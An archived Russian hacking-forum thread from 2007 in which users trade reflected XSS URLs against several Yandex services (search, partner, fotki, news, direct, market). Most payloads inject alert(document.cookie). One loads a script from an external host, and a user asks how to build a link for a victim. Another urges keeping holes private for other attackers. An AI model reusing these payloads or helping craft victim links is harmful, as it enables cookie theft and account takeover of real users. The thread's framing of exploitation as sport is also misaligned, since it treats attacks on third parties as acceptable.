PDA

Просмотр полной версии : Яндекс.Xss

NOmeR1
16.11.2007, 23:50
Решил только что в свой чекер уязвимостей для прикола вписать yandex.ru. Вот что получилось :D
http://yandex.ru/?text="><script>alert(document.cookie)</script>
vp$
19.11.2007, 19:27
огромная просьба, подскажите, как грамотно составить ссылку для жертвы, используя эту Хss , с меня +
vadim399
19.11.2007, 20:27
Решил только что в свой чекер уязвимостей для прикола вписать yandex.ru. Вот что получилось :D
http://yandex.ru/?text="><script>alert(document.cookie)</script>
Прикрыли лавочку)
VERte][
19.11.2007, 20:29
быстро однако) часа 2 назад ещё работало)))
inv
19.11.2007, 20:35
http://www.google.com/search?ie=UTF-8&hl=ru&q=%D1%8F%D0%BD%D0%B4%D0%B5%D0%BA%D1%81%20xss

xss у меня тоже не пашет=\ (опера)
vp$
19.11.2007, 20:42
увы, уже неактуально((
SWAT
19.11.2007, 22:59
чтот быстро прикрыли
NOmeR1
20.11.2007, 19:18
http://partner.yandex.ru/registered/?cmd=%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript% 3E&act=%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript%3 E
Вот вам ещё xss'ка =)
inv
20.11.2007, 19:20
не должен быть авторизирован
убери пробелы
вчера работало
FeraS
20.11.2007, 19:23
В осле и мозилле пашет))
В опере жаваскрипт включен, но се равно не фурычит)
inv
20.11.2007, 19:31
http://te
st-lo
l.narod.ru/1.JPG

(моя опера)
schut123
20.11.2007, 19:58
А чем вы на уязвимости чекаете?
FeraS
20.11.2007, 19:59
inv
Какая версия?
NOmeR1
20.11.2007, 20:00
А чем вы на уязвимости чекаете?
Если уж так интересно, то вот (http://forum.antichat.ru/thread53361.html).
inv
20.11.2007, 20:00
9.24

ты просто открой код страницы и найди alert('xss')
и посмотри что там вокруг...==)
freddi
20.11.2007, 20:07
NOmeR1, это стоило отдельной темы?

add
NOmeR1, а ответить нормально слабо?
FeraS
20.11.2007, 20:08
Сори я пробка. Не разлогинился http://kolobok.us/smiles/standart/blush2.gif
inv
20.11.2007, 20:09
FeraS=\

freddi
здесь столько бестолковых тем...........тебя именно эта не устроила?
для яндекса можно и создать
Don1=2
21.11.2007, 01:21
люди, убедительная просьба. не выкладывайте в паблик такие уязвимости ИХ МОМЕНТАЛЬНО ИЗ-ЗА ВАС ЗАКРЫВАЮТ. подумайте, какой вред вы наносите другим хекерам , которые нашли их до вас...
убедительная просьба к модераторам НЕ УДАЛЯТЬ МОЙ ПОСТ
inv
21.11.2007, 11:05
а ты не подумал какой вред хекеры наносят?=)
Захотел выложил,это его право
понятное дело,что обитая только в закрытых разделах,он бы выкладывал только там.
+toxa+
13.12.2007, 13:50
http://fotki.yandex.ru/actions/favorites-add.xml?author=lalala%22%3E%3Cscript%20src=%22http ://toxa.nov.ru/s.js%22%3E%3C/script%3E
ZAMUT
28.12.2007, 02:22
И есчо XSS
news.yandex.ru
http://news.yandex.ru/yandsearch?cl4url=&country="><script>alert(document.cookie)</script>
Вот собственно XSS
direct.yandex.ru
http://direct.yandex.ru/search?text=<h1><big>хек =\\</big></h1><script>alert(document.cookie)</script>
И есчо ...

market.yandex.ru
Поиск:
<SCRIPT> alert(document.cookie); </SCRIPT>
!Регистр имеет значение, ибо, хоть и слабая, но фильтрация!
http://market.yandex.ru/search.xml?cvredirect=1&text=<SCRIPT> alert(document.cookie); </SCRIPT>